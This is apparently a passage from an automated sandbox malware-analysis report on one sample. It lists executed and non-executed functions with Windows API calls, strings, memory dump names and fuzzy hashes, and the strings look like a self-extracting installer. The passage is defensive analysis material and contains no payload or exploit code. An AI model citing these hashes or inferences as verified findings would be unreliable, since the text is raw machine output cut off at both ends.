                              • SetFileAttributesA.KERNEL32 ref: 00007FF776D1544A
                                • Part of subcall function 00007FF776D17D28: FindResourceA.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D52
                                • Part of subcall function 00007FF776D17D28: LoadResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D69
                                • Part of subcall function 00007FF776D17D28: DialogBoxIndirectParamA.USER32 ref: 00007FF776D17D9F
                                • Part of subcall function 00007FF776D17D28: FreeResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17DB1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 2018477427-0
                              • Opcode ID: 4daaa1f3d40ba64d64b2571045b3072099791c5c85b447b1f861ee90d45f7df3
                              • Instruction ID: 02fcbc43ef61400a516ffa1e4d3ef1826f0dd371de9af9a72d1701b2d67c0b77
                              • Opcode Fuzzy Hash: 4daaa1f3d40ba64d64b2571045b3072099791c5c85b447b1f861ee90d45f7df3
                              • Instruction Fuzzy Hash: 41119EF393C64682FE186B38AC44376E690FB49319F964930D94E067A9CFFDE895C610
                              Function 00007FF776D1862F Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: _cexitexit
                              • String ID:
                              • API String ID: 521370574-0
                              • Opcode ID: a5c620c4e924556ca1facd24c49a64e941be98dafac3d88271bc441307718ef7
                              • Instruction ID: 8465db2a84c11c50c9c406a498cb9d9464880d902e2a4aa60e7e65e56aeab6ca
                              • Opcode Fuzzy Hash: a5c620c4e924556ca1facd24c49a64e941be98dafac3d88271bc441307718ef7
                              • Instruction Fuzzy Hash: E5E0ECB2D3C605C7EF68E770AD043667261BB04750FC21871C40943158CFBCA8448BB1
                              Function 00007FF776D17E08 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CharPrev
                              • String ID:
                              • API String ID: 122130370-0
                              • Opcode ID: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                              • Instruction ID: a12d15d627134ea311f2c46de84b8417e16f82211c2cbe5230d84f90d0a4dee8
                              • Opcode Fuzzy Hash: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                              • Instruction Fuzzy Hash: 74010C52A3C6C286FF141B219C4026EFA90A705BA0F995630DB69467D9CB6CDD418710
                              Function 00007FF776D159B0 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                              • Instruction ID: 143f08d500684bf94dd7c08893a82b141f4d04989cdd3dc0759b00ea4a7daa85
                              • Opcode Fuzzy Hash: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                              • Instruction Fuzzy Hash: A0F062B263C6C282EF1C5F79F981179B660EB48B58F814735DA2B46688CFBCD480C720

                              Non-executed Functions

                              Function 00007FF776D1366E Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 177windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                              • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$vclib
                              • API String ID: 3530494346-4181130428
                              • Opcode ID: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                              • Instruction ID: 7150e9cabe32c5d4e41eda5a7eac3b8db8413b1898d8641e99caa52c97630c23
                              • Opcode Fuzzy Hash: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                              • Instruction Fuzzy Hash: 2A7174E2E3C68286FF586B71ED14377EA92AB85B91FC64930C94D4668DCFFCD4058620
                              Function 00007FF776D15F7E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D15FB0
                              • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D15FC1
                              • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D15FD0
                              • GetDlgItem.USER32 ref: 00007FF776D15FFD
                              • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D1600E
                              • GetDlgItem.USER32 ref: 00007FF776D16026
                              • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF776D13432), ref: 00007FF776D1603A
                              • FreeResource.KERNEL32 ref: 00007FF776D16151
                              • SendMessageA.USER32 ref: 00007FF776D161B3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: CABINET
                              • API String ID: 1305606123-1940454314
                              • Opcode ID: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                              • Instruction ID: 1a3db06221c3cb18987669f88e25fdf8303effeb5b0683c1f562caacc53e7d93
                              • Opcode Fuzzy Hash: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                              • Instruction Fuzzy Hash: F14161B3A3C68286FF186B70AC54377EAA2FF89745FC64834C90E46659DFBDD4448620
                              Function 00007FF776D11258 Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                              • String ID:
                              • API String ID: 2168512254-0
                              • Opcode ID: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                              • Instruction ID: 97b7eb040c9f37d6614aad809d5496c60abcae3f1a911dc512c21935c5dd7dee
                              • Opcode Fuzzy Hash: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                              • Instruction Fuzzy Hash: E5516D73638A41CAEF14AF21E8841AEBBA5FB4DB88B825535DA0D53718CF78D845CB10
                              Function 00007FF776D11BF4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2829607268-3733053543
                              • Opcode ID: e53e65c2787d87670e56c63ed786baaef79f64d4a17083fae0ac370a986fd784
                              • Instruction ID: 774d7d8b89e21c17d8e7e1f8ecfb8c0cfeee8647c6b9714428574223f04dbc59
                              • Opcode Fuzzy Hash: e53e65c2787d87670e56c63ed786baaef79f64d4a17083fae0ac370a986fd784
                              • Instruction Fuzzy Hash: 4E21A2B3A3C64286EF149B30E80477BFA62FB89745F819535DA4E06A58CFBCD4448B10
                              Function 00007FF776D18BF4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                              • Instruction ID: 0f2bcf59f135cbf323f78fb029b09121674db2b66bc9240ae3d20e176e0a2541
                              • Opcode Fuzzy Hash: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                              • Instruction Fuzzy Hash: 24113B62A38F418AEF04EF71EC442A973A5FB49758F810E30EA6D47758EFBCD5648250
                              Function 00007FF776D13D34 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Message$BeepVersion
                              • String ID: vclib
                              • API String ID: 2519184315-3480049729
                              • Opcode ID: 65565c2cae3d15c284d40b135d24e5845c1464aff533b678858a98e3463f2ac9
                              • Instruction ID: 22071a0e47d7fbf033087a90af5b12e0878fe0909302f85570d12819031ed18b
                              • Opcode Fuzzy Hash: 65565c2cae3d15c284d40b135d24e5845c1464aff533b678858a98e3463f2ac9
                              • Instruction Fuzzy Hash: FD91B2E3A3C24286FF68AB35DC4467BA660BB04350F930935DA5D83298DEFDE9418720
                              Function 00007FF776D17320 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 438COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                              • String ID: "$:$RegServer$\
                              • API String ID: 1203814774-3501211309
                              • Opcode ID: 4699c8f118470d67e499e418bb890767bac054a97211b70f17215beccea90d48
                              • Instruction ID: 284aace64f18b8d9dc4758ad4e7210a84e09f409a88b8dafed71a178c64d252f
                              • Opcode Fuzzy Hash: 4699c8f118470d67e499e418bb890767bac054a97211b70f17215beccea90d48
                              • Instruction Fuzzy Hash: 1A02A0E3E3C68245FE296B349C1027BEB91AF45750FDA0D31C95E066ADCEBCAC05C660
                              Function 00007FF776D13A4E Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120threadwindowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                              • String ID: $vclib
                              • API String ID: 2654313074-3349352094
                              • Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                              • Instruction ID: b8de05c8e8b47cc50e74309d73b00dfe1ee804338a1b650e01b8e0161dfa2746
                              • Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                              • Instruction Fuzzy Hash: 905196B3A3C64286FF186B31ED4427AEA62FB89B51F868931C91D0679CCFBCD4458710
                              Function 00007FF776D14B70 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 141libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14B9A
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14BBE
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14BDE
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C05
                              • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C36
                              • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C54
                              • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14C6E
                              • FreeLibrary.KERNEL32 ref: 00007FF776D14D50
                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF776D13723), ref: 00007FF776D14D6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                              • API String ID: 1865808269-1731843650
                              • Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                              • Instruction ID: 8bc58d868f168c5220974ce1a0c64eadc43a0241c68a5cf285d17e952186001f
                              • Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                              • Instruction Fuzzy Hash: 7951A4A3A3D78186EF19AB21AC1417ABBA1FB85B90FC64934C94D07758EFBCD409C710
                              Function 00007FF776D12644 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                              • API String ID: 229715263-2428544900
                              • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                              • Instruction ID: 4b784c93569da163efc6eb473ba56628848a5340a8c4565e75503b93979cb9a1
                              • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                              • Instruction Fuzzy Hash: D7517FA3A3C68187EE159B20E8442BBBBA1FB49B80F954431DA4E07798DF7DD945C710
                              Function 00007FF776D1351E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                              • String ID: vclib
                              • API String ID: 3785188418-3480049729
                              • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                              • Instruction ID: 5e02d5041c109fb76fd5e76a04c74fd4804697ae3ea42f280db0b23fe907492b
                              • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                              • Instruction Fuzzy Hash: 553129B293C64286FE186B35EC04276E651FB8AB51FC69A30D91D06398DFFC9545C610
                              Function 00007FF776D11130 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69librarymemoryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                              • String ID: CheckTokenMembership$advapi32.dll
                              • API String ID: 4204503880-1888249752
                              • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                              • Instruction ID: c4e3553a36d1d08ea4aed6d016528c5a7b04c53aa3b3ec65a5d8956f065a1933
                              • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                              • Instruction Fuzzy Hash: F1314D7362CB458ADE149F26F8401AABBA1FB89B80F864535DE4D47718DF7CD445CB00
                              Function 00007FF776D12AE8 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                              • String ID:
                              • API String ID: 975904313-0
                              • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                              • Instruction ID: 638e48e756bec90a1ac9115188fa7b2ef47753458020897163f582a944c6d5a6
                              • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                              • Instruction Fuzzy Hash: 6B71B793A3C6C585FF595F34D8103BAEB92AF49B90F894930CB9D06389DEBDD4858321
                              Function 00007FF776D12898 Relevance: 12.2, APIs: 8, Instructions: 162memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                              • String ID:
                              • API String ID: 2156179360-0
                              • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                              • Instruction ID: 4dcc22bced01f01b714b8cce5e1b42433c1bf8b3aa2bc9bcb260d8c5485a3cd2
